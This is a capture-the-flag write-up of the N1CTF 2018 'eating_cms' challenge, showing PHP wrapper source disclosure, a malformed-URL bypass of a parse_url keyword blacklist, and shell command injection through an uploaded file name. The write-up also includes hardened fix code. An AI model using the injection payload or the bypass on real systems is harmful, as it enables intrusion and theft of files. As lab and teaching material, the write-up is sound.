[N1CTF 2018] eating_cms Writeup


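Opening the challenge shows a login page. I threw sqlmap at it, which failed @_@. Tried weak passwords, which also failed. So let's scan the directories.

The scan finds a register.php page. We register an arbitrary account and log in, and find some kind of food-related CMS. A glance at the URL: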

http://793382b9-bb75-4ce7-8dd6-cfdedaaff1d7.node5.buuoj.cn:81/user.php?page=guest

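Anyone who has looked into PHP_chain will probably see at a glance that a pseudo-protocol (PHP wrapper) vulnerability is very likely here. Let's try whether php_filter_chain_generator does it in one shot: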

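Nice, the phpinfo page comes straight out. Looking at disabled_functions, system and the like are not in it. I constructed '<?php system("echo '2' "); ?>' and found that its output is echoed normally at the start of the page.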

I thought I could end the fight right here with cat /flag, but what cat /flag returned was garbage @_@

É
PÃàÐÐø

No idea what kind of encoding this has been through; misc and crypto are not my thing @_@

So I had to find another way. Since the pseudo-protocol is confirmed to be usable, let's try reading the source code:

http://549c69b5-ed26-4343-b5c5-19b3e3a71099.node5.buuoj.cn:81//user.php?page=php://filter/convert.base64-encode/resource=user

This reads user.php, which references function.php. Let's first read out all the source code we can find.

user.php

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
    Header("Location: index.php");

}
if($_SESSION['isadmin'] === '1'){
    $oper_you_can_do = $OPERATE_admin;
}else{
    $oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
    if(!isset($_GET['page']) || $_GET['page'] === ''){
        $page = 'info';
    }else {
        $page = $_GET['page'];
    }
}
else{
    if(!isset($_GET['page'])|| $_GET['page'] === ''){
        $page = 'guest';
    }else {
        $page = $_GET['page'];
        if($page === 'info')
        {
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
            Header("Location: user.php?page=guest");
        }
    }
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

function.php

<?php
session_start();
require_once "config.php";
function Hacker()
{
    Header("Location: hacker.php");
    die();
}


function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function filter_directory_guest()
{
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function Filter($string)
{
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
        if (strpos("$whitelist", $string[$i]) === false) {
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
        Hacker();
    }
    if (is_string($string)) {
        return $mysqli->real_escape_string($string);
    } else {
        return "";
    }
}

function sql_query($sql_query)
{
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

function login($user, $pass)
{
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
    if ($res->num_rows) {
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return;
}

function updateadmin($level,$user)
{
    $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return;
}

function register($user, $pass)
{
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

function logout()
{
    session_destroy();
    Header("Location: index.php");
}

?>

config.php

<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){
        echo "no sql connection".mysqli_connect_error();
        $mysqli=null;
        die();
}
?>

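Looking closely at function.php, there are three blacklisted keywords: flag, manage and ffffllllaaaaggg. Trying to read them returns the hacker page directly. Going back over the source, the filter_directory_guest function uses parse_url to split the URL, then uses parse_str to parse the query part into an associative array, and then runs the blacklist check.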


Let's first look at the parse_url function:

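In PHP, parse_url parses a URL and returns an associative array containing the URL's components. Specifically, the components parse_url can parse are:

 - scheme: the protocol part, such as http or https.
 - host: the host name part, such as www.example.com.
 - port: the port number part, if one is given explicitly.
 - user: the user information, if the URL contains it.
 - pass: the password information, if the URL contains it.
 - path: the path part, such as /path/to/file.
 - query: the query string part, after the ?.
 - fragment: the fragment identifier, after the #.

For a URL such as "http://username:password@www.example.com:8080/path/to/file.php?foo=bar&baz=qux#section2", parse_url returns the following: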

Array
(
    [scheme] => http
    [host] => www.example.com
    [port] => 8080
    [user] => username
    [pass] => password
    [path] => /path/to/file.php
    [query] => foo=bar&baz=qux
    [fragment] => section2
)

So how can we bypass the blacklist check?

There is a very simple way: "On seriously malformed URLs, parse_url() may return FALSE". Let's construct a seriously malformed URL:

http://127.0.0.1//test.php

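parse_url parses both 127.0.0.1 and test.php as the host, which causes an error, so it returns FALSE directly. Naturally nothing can then be assigned to the associative array, and the blacklist check is bypassed.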

The two slashes // here are the bypass for older PHP versions; on newer PHP versions, three slashes /// do the job.
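As an added example (not the challenge's code): the blacklist fails open because it scans a re-parsed copy of REQUEST_URI while include uses $_GET['page'], so the fix is to decide on $_GET['page'] itself against an allow-list. The function names are hypothetical, and the guest allow-list is an assumption built from $OPERATE plus the guest page.

```php
<?php
// Added example, not the challenge's code. The keyword list and the $OPERATE
// values come from the page; the function names are hypothetical.
const KEYWORDS    = ['flag', 'manage', 'ffffllllaaaaggg'];
const PAGES_GUEST = ['guest', 'userinfo', 'upload', 'search']; // assumed allow-list

// Same logic as filter_directory(): re-parse REQUEST_URI, then scan the query.
function blacklist_hit(string $requestUri): bool
{
    $uri = parse_url($requestUri);           // false on a seriously malformed URI
    parse_str($uri['query'] ?? '', $query);  // false -> empty query -> nothing is scanned
    foreach ($query as $k => $v) {
        $text = $k . ' ' . (is_array($v) ? json_encode($v) : $v);
        foreach (KEYWORDS as $token) {
            if (stripos($text, $token) !== false) {
                return true;
            }
        }
    }
    return false;                            // also the answer when parsing failed
}

// Hardened: decide on the value that include actually receives, and accept
// only known page names, so nothing depends on how parse_url() behaves.
function resolve_page(array $get): ?string
{
    $page = $get['page'] ?? '';
    if ($page === '') {
        return 'guest';
    }
    return (is_string($page) && in_array($page, PAGES_GUEST, true)) ? $page : null;
}

// Constructed sample request URIs, using only values that appear on this page.
$samples = [
    '/user.php?page=guest',
    '/user.php?page=ffffllllaaaaggg',
    '///user.php?page=ffffllllaaaaggg',
    '///user.php?page=php://filter/convert.base64-encode/resource=user',
];
foreach ($samples as $uri) {
    // PHP fills $_GET from the text after the first '?', independently of parse_url().
    parse_str(substr($uri, strpos($uri, '?') + 1), $get);
    printf("%-68s parse_url=%-5s blacklist_hit=%-5s resolve_page=%s\n",
        $uri,
        parse_url($uri) === false ? 'false' : 'array',
        var_export(blacklist_hit($uri), true),
        var_export(resolve_page($get), true));
}
```

A null from resolve_page() means the request is refused before include is reached; this is the same idea as the in_array($page, $oper_you_can_do) check that is commented out in user.php.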


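Good, now that we know how to bypass the blacklist check, let's use the pseudo-protocol to read the flag, manage and ffffllllaaaaggg pages.

Of these, the flag and manage pages cannot be read; only the ffffllllaaaaggg page can.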

ffffllllaaaaggg

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>

This reveals yet another page, m4aaannngggeee. Let's read it.

m4aaannngggeee

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";

?>

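Visiting templates/upload.html shows an upload page. Uploading an arbitrary image produces an error.

And yet another file shows up, upllloadddd.php (the challenge author really likes nesting dolls @_@).

Read it with the pseudo-protocol: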

upllloadddd

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>

Auditing the code, there is an obvious RCE vulnerability:

$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");

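The file name we supply is concatenated straight into the system call without any filtering. The problem is that this upload page does not work properly @_@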
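As an added example (not the challenge's code), a hardened form of the upllloadddd.php logic: the client-supplied name never reaches the file system or a shell, the type is validated before the file is moved, and the base64 encoding is done in PHP. handle_upload() is a hypothetical name; the size limit and the three image types are taken from the page.

```php
<?php
// Added example, not the challenge's code; handle_upload() is a hypothetical name.
const MAX_SIZE     = 10000000; // same limit as $size on the page
const ALLOWED_MIME = ['image/gif' => 'gif', 'image/png' => 'png', 'image/jpeg' => 'jpg'];

function handle_upload(array $file, string $dir): string
{
    // Reject failed, forged or oversized uploads before touching the file.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')
        || ($file['size'] ?? 0) > MAX_SIZE) {
        throw new RuntimeException('upload rejected');
    }

    // Decide the type from the content, not from the client's file name,
    // and do it before the file is stored (the original checked afterwards).
    $info = getimagesize($file['tmp_name']);
    $mime = $info['mime'] ?? '';
    if (!array_key_exists($mime, ALLOWED_MIME)) {
        throw new RuntimeException('type not allowed');
    }

    // Server-generated name: nothing the client sent ends up in a path.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_MIME[$mime];
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('can not move');
    }

    // Encode in PHP instead of system("cat ... | base64 -w 0"): no shell is involved.
    $b64 = base64_encode(file_get_contents($dest));

    // The original name is only displayed, and is HTML-escaped first.
    $shown = htmlspecialchars($file['name'] ?? '', ENT_QUOTES, 'UTF-8');
    return "file upload success<br />{$shown}<img src='data:{$mime};base64,{$b64}'>";
}

// Intended call site inside the upload page:
// echo handle_upload($_FILES['file'], './upload_b3bb2cfed6371dfeb2db1dbcceb124d3/');
```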

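I really couldn't get any further, so I looked at writeups online and found that the real upload page is actually m4aaannngggeee (what can i say? Speechless).

Visit m4aaannngggeee, upload an arbitrary file, intercept the request, change filename and replay it.

But trying ls / failed, while cat config.php echoed normally, so it looks like / is filtered. No problem, we change directory one level at a time.

flag_233333 turns up in the root directory. Constructing filename=";cd ..;cd ..;cd ..;cd ..;cat flag_233333;#" gets the flag.

(This outrageous challenge was a real pain; writing this writeup left my head spinning @_@)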

Notice: 大K | All rights reserved | Original content unless otherwise noted | This site is licensed under BY-NC-SA
